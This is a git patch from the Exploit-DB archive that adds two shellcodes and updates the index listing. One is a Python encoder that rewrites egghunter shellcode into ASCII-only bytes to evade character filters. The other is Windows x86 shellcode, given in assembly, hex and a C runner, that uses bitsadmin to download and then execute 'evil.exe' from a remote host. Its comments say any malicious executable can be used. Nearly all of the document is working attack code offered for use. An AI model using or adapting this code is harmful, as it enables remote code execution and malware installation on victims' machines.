From 5632d13fea797cf6988ad6153cd9cffe30025c38 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 28 Jun 2019 05:01:52 +0000
Subject: [PATCH] DB: 2019-06-28

2 changes to exploits/shellcodes

Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode
Linux/x86_64 - Reverse (0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode
Linux/x86 - ASCII AND_ SUB_ PUSH_ POPAD Encoder Shellcode
Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)
---
 files_shellcodes.csv           |   4 +-
 shellcodes/linux_x86/47040.py  | 280 +++++++++++++++++++++++++++++++++
 shellcodes/windows_x86/47041.c |  89 +++++++++++
 3 files changed, 372 insertions(+), 1 deletion(-)
 create mode 100755 shellcodes/linux_x86/47040.py
 create mode 100644 shellcodes/windows_x86/47041.c

diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 39aac8a03..7691aa1a8 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -971,4 +971,6 @@ id,file,description,date,author,type,platform
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64
 46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86
 47008,shellcodes/linux_x86-64/47008.c,"Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)",2019-06-18,"Aron Mihaljevic",shellcode,linux_x86-64
-47025,shellcodes/linux_x86-64/47025.c,"Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode",2019-06-24,"Aron Mihaljevic",shellcode,linux_x86-64
+47025,shellcodes/linux_x86-64/47025.c,"Linux/x86_64 - Reverse (0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode",2019-06-24,"Aron Mihaljevic",shellcode,linux_x86-64
+47040,shellcodes/linux_x86/47040.py,"Linux/x86 - ASCII AND_ SUB_ PUSH_ POPAD Encoder Shellcode",2019-06-27,"Petr Javorik",shellcode,linux_x86
+47041,shellcodes/windows_x86/47041.c,"Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86
diff --git a/shellcodes/linux_x86/47040.py b/shellcodes/linux_x86/47040.py
new file mode 100755
index 000000000..7f6dd41da
--- /dev/null
+++ b/shellcodes/linux_x86/47040.py
@@ -0,0 +1,280 @@
+#!/usr/bin/env python3
+
+################################################################################
+# INTRODUCTION
+################################################################################
+
+# Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH, POPAD
+# Date: 26.6.2019
+# Encoder Author: Petr Javorik, www.mmquant.net
+# Tested on: Linux ubuntu 3.13.0-32-generic, x86
+# Special thx to: Corelanc0d3r for intro to this technique
+#
+# Description:
+# This encoder is based on egghunter found in https://www.exploit-db.com/exploits/5342
+# Core idea is that every dword can be derived using 3 SUB instructions
+# with operands consisting strictly of ASCII compatible bytes.
+#
+# What it does?:
+# Suppose that we want to push \x05\xEB\xD1\x8B (0x8BD1EB05) to the stack.
+# Then we can do it as follows:
+#
+# AND EAX, 3F465456
+# AND EAX, 40392B29         ; Two AND instructions zero EAX
+# SUB EAX, 3E716230         ; Subtracting 3 dwords consisting
+# SUB EAX, 5D455523         ; of ASCII compatible bytes from 0x00000000
+# SUB EAX, 5E5D7722         ; we get EAX = 0x8BD1EB05
+# PUSH EAX
+
+# Mandatory bytes:
+# \x25  AND EAX, imm32
+# \x2d  SUB EAX, imm32
+# \x50  PUSH EAX
+# \x61  POPAD
+
+# How to use:
+# Edit the SETTINGS section and simply run as
+# ./ASCIIencoder
+
+# ProTip:
+# Take special attention to the memory between the end of decoder instructions
+# and the beginning of decoded shellcode. Program flow must seamlessly step over
+# this memory. If this "bridge memory area" contains illegal opcodes they can
+# be rewritten with additional PUSH instruction appended to the end of generated
+# shellcode. Use for example PUSH 0x41414141.
+
+################################################################################
+
+import itertools
+import struct
+import random
+import sys
+
+assert sys.version_info >= (3, 6)
+
+
+################################################################################
+# CONSTANTS - no changes needed here
+################################################################################
+
+# ASCII character set
+L_CASE = bytearray(range(0x61, 0x7b))   # abcdefghijklmnopqrstuvwxyz
+U_CASE = bytearray(range(0x41, 0x5b))   # ABCDEFGHIJKLMNOPQRSTUVWXYZ
+NUMBERS = bytearray(range(0x30, 0x3a))  # 0123456789
+SPECIAL_CHARS = bytearray(
+    itertools.chain(
+        range(0x21, 0x30),  # !"#$%&\'()*+,-.
+        range(0x3a, 0x41),  # :;<=>?
+        range(0x5b, 0x61),  # [\\]^_
+        range(0x7b, 0x7f)   # {|}
+    )
+)
+ASCII_NOPS = b'\x41\x42\x43\x44'     # and many more
+ALL_CHARS = (L_CASE + U_CASE + NUMBERS + SPECIAL_CHARS)
+
+################################################################################
+# SETTINGS - enter shellcode, select character set and bad chars
+################################################################################
+
+input_shellcode = (
+    b'\x8b\xd1\xeb\x05\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e'
+    b'\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf'
+    b'\x75\xe7\xff\xe7'
+)
+
+# input_charset = U_CASE + L_CASE
+input_charset = ALL_CHARS
+
+# badchars = b''
+badchars = b''
+
+nops = ASCII_NOPS
+
+################################################################################
+# CORE - no changes needed here
+################################################################################
+
+class ASCII_Encoder(object):
+
+    def __init__(self, shellcode_, charset_, badchars_, nops_):
+
+        # Constructor args
+        self.shellcode = bytearray(shellcode_)
+        self.charset = charset_
+        self.badchars = badchars_
+        self.nops = nops_
+
+        # Private vars
+        self.encoded_dwords = []
+        self.twos_comps = []
+        self.sub_operands = []
+        self.payload = bytearray()
+
+    def encode(self):
+
+        self.align_to_dwords()
+        self.remove_badchars()
+        self.derive_dwords_sub()
+        self.compensate_overflow()
+        self.derived_dwords_to_sub_operands()
+        self.twos_comp_check()
+        self.compile_payload()
+
+
+    def align_to_dwords(self):
+
+        # Input shellcode alignment to dword multiples
+        nop = b'\x90'
+        pad_count = 4 - (len(self.shellcode) % 4)
+        if 0 < pad_count < 4:
+            self.shellcode += nop * pad_count
+
+    def remove_badchars(self):
+
+        for badchar in self.badchars:
+            self.charset = self.charset.replace(bytes([badchar]), b'')
+            self.nops = self.nops.replace(bytes([badchar]), b'')
+
+    def derive_dwords_sub(self):
+
+        def get_sub_encoding_bytes(target):
+            """
+            target      x   y       z
+            0x100 - (0x21+0x21) = 0xbe
+
+            We need to select x, y, z such that it gives target when summed and all of
+            x, y, z is ASCII and non-badchar
+            """
+
+            # Get all possible solutions
+            all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
+            results = []
+            for x, y in all_xy:
+                z = target - (x + y)
+                # Get only bytes which are ASCII and non-badchar
+                if (0 < z < 256) and (z in self.charset):
+                    results.append({
+                        'x': x,
+                        'y': y,
+                        'z': z,
+                        'of': True if target >= 0x100 else False
+                    })
+
+            # Choose random solution
+            return random.choice(results)
+
+        for dword in struct.iter_unpack('<L', self.shellcode):
+
+            # 32-bit 2's complement
+            twos_comp = (dword[0] ^ 0xffffffff) + 1
+            self.twos_comps.append(twos_comp)
+
+            encoded_block = []
+            for byte_ in struct.pack('>L', twos_comp):
+
+                # Will overflow be used when calculating this byte using 3 SUB instructions?
+                if byte_ / 3 < min(self.charset):
+                    byte_ += 0x100
+                encoded_block.append(
+                    get_sub_encoding_bytes(byte_))
+                pass
+
+            self.encoded_dwords.append(encoded_block)
+
+    def compensate_overflow(self):
+
+        # If neighbor lower byte overflow then subtract 1 from max(x, y, z)
+        for dword in self.encoded_dwords:
+            for solution, next_solution in zip(dword, dword[1:]):
+                if next_solution['of']:
+                    max_value_key = max(solution, key=solution.get)
+                    solution[max_value_key] -= 1
+
+    def derived_dwords_to_sub_operands(self):
+
+        for dword in self.encoded_dwords:
+
+            sub_operand_0 = struct.pack('<BBBB',
+                                        *[solution['x'] for solution in dword])
+            sub_operand_1 = struct.pack('<BBBB',
+                                        *[solution['y'] for solution in dword])
+            sub_operand_2 = struct.pack('<BBBB',
+                                        *[solution['z'] for solution in dword])
+
+            self.sub_operands.append([
+                sub_operand_0,
+                sub_operand_1,
+                sub_operand_2
+            ])
+
+    def twos_comp_check(self):
+
+        # Check if calculated dwords for SUB instruction give 2's complement if they are summed
+        for twos_comp, sub_operand in zip(self.twos_comps, self.sub_operands):
+            sup_operand_sum = sum(
+                [int.from_bytes(dw, byteorder='big') for dw in sub_operand])
+
+            # Correction of sum if there is overflow on the highest byte
+            if sup_operand_sum > 0xffffffff:
+                sup_operand_sum -= 0x100000000
+            assert (twos_comp == sup_operand_sum)
+
+    def compile_payload(self):
+
+        def derive_bytes_and():
+
+            all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
+            results = []
+            for x, y in all_xy:
+                if x + y == 127:
+                    results.append((x, y))
+            while 1:
+                yield random.choice(results)
+
+        def derive_dwords_and():
+
+            gen_bytes = derive_bytes_and()
+            bytes_ = []
+            for _ in range(0, 4):
+                bytes_.append(next(gen_bytes))
+
+            return bytes_
+
+        # POPAD n times to adjust ESP.
+        # Decoded shellcode must be written after the decoder stub
+        self.payload += b'\x61' * (len(self.encoded_dwords))
+
+        for sub_operand in reversed(self.sub_operands):
+
+            # Clearing EAX instructions with AND instructions
+            bytes_ = derive_dwords_and()
+
+            self.payload += b'\x25' + struct.pack('<BBBB',
+                                             *[byte_[0] for byte_ in bytes_])
+            self.payload += b'\x25' + struct.pack('<BBBB',
+                                             *[byte_[1] for byte_ in bytes_])
+
+            # Encoded shellcode with SUB instructions
+            self.payload += b'\x2d' + sub_operand[0][::-1]
+            self.payload += b'\x2d' + sub_operand[1][::-1]
+            self.payload += b'\x2d' + sub_operand[2][::-1]
+
+            # Push EAX
+            self.payload += b'\x50'
+
+        # Pad with NOPs
+        self.payload += bytes(random.choices(self.nops, k=9))
+
+    def print_payload(self):
+
+        print('Original payload length: {}'.format(len(input_shellcode)))
+        print('Encoded payload length: {}'.format(len(self.payload)))
+        print('hex:  ',
+              '\\x' + '\\x'.join('{:02x}'.format(byte) for byte in self.payload))
+
+
+if __name__ == '__main__':
+
+    encoder = ASCII_Encoder(input_shellcode, input_charset, badchars, nops)
+    encoder.encode()
+    encoder.print_payload()
\ No newline at end of file
diff --git a/shellcodes/windows_x86/47041.c b/shellcodes/windows_x86/47041.c
new file mode 100644
index 000000000..e38073971
--- /dev/null
+++ b/shellcodes/windows_x86/47041.c
@@ -0,0 +1,89 @@
+/*
+; Shellcode Title : bitsadmin download and execute
+; Shellcode Author : Joseph McDonagh
+; Date June 26, 2019
+; Shellcode Length 210
+; However, if the application you are exploiting already loads it, then all you need ...
+; ... is the System Call and ExitProcess in kernel32.dll
+; In between download and execute is ping -n 30 localhost, which provides a delay for the ...
+; ... relatively slow bitsadmin.exe program
+; Tested on Windows XP SP2
+; Acknowledgement to Kartik Durg, who inspired me to start making my own shellcode
+; after reading iamroot blog
+; Acknowledgement to POB, using start has really helped me alot in manual shellcode efforts
+; start bitsadmin.exe /transfer "njob30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe
+; evil.exe can be generated by msfvenom, or be ANY malcious executable you happen to have
+;
+; EDB-Note: start bitsadmin.exe /transfer "n job30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe
+
+
+xor eax, eax             ;Get the msvcrt.dll
+mov ax, 0x7472           ;"tr\0\0"
+push eax
+push dword 0x6376736d    ;"cvsm"
+push esp
+
+; LoadLibrary
+mov ebx, 0x7c801d77      ;Address of function LoadLibraryA (winxp)
+call ebx
+mov ebp, eax             ;msvcrt.dll is saved in ebp
+
+xor eax, eax
+push eax
+
+push 0x6578652e ; exe.
+push 0x6c697665 ; live
+push 0x5c3a6320 ; \:c 
+push 0x632f2065 ; c/ e
+push 0x78652e64 ; xe.d
+push 0x6d632026 ; mc &
+push 0x2620312e ; & 1.
+push 0x302e302e ; 0.0.
+push 0x37323120 ; 721 
+push 0x3033206e ; 03 n
+push 0x2d20676e ; - gn
+push 0x69702026 ; ip &
+push 0x26202265 ; & "e
+push 0x78652e6c ; xe.l
+push 0x6976655c ; ive\
+push 0x3a632220 ; :c" 
+push 0x6578652e ; exe.
+push 0x6c697665 ; live
+push 0x2f30312e ; /01.
+push 0x30312e38 ; 01.8
+push 0x36312e32 ; 61.2
+push 0x39312f2f ; 91//
+push 0x3a707474 ; :ptt
+push 0x68202230 ; h "0
+push 0x33626f6a ; 3boj
+push 0x6e222072 ; n" r
+push 0x6566736e ; efsn
+push 0x6172742f ; art/
+push 0x20657865 ;  exe
+push 0x2e6e696d ; .nim
+push 0x64617374 ; dast
+push 0x69622074 ; ib t
+push 0x72617473 ; rats
+
+mov edi,esp
+push edi
+mov eax, 0x77c293c7
+call eax
+
+xor eax, eax
+push eax
+mov eax, 0x7c81caa2
+call eax
+
+*/
+
+char code[]=
+
+"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x20\x63\x3a\x5c\x68\x65\x20\x2f\x63\x68\x64\x2e\x65\x78\x68\x26\x20\x63\x6d\x68\x2e\x31\x20\x26\x68\x2e\x30\x2e\x30\x68\x20\x31\x32\x37\x68\x6e\x20\x33\x30\x68\x6e\x67\x20\x2d\x68\x26\x20\x70\x69\x68\x65\x22\x20\x26\x68\x6c\x2e\x65\x78\x68\x5c\x65\x76\x69\x68\x20\x22\x63\x3a\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x30\x22\x20\x68\x68\x6a\x6f\x62\x33\x68\x72\x20\x22\x6e\x68\x6e\x73\x66\x65\x68\x2f\x74\x72\x61\x68\x65\x78\x65\x20\x68\x6d\x69\x6e\x2e\x68\x74\x73\x61\x64\x68\x74\x20\x62\x69\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";
+
+int main(int argc, char **argv)
+ {
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}
\ No newline at end of file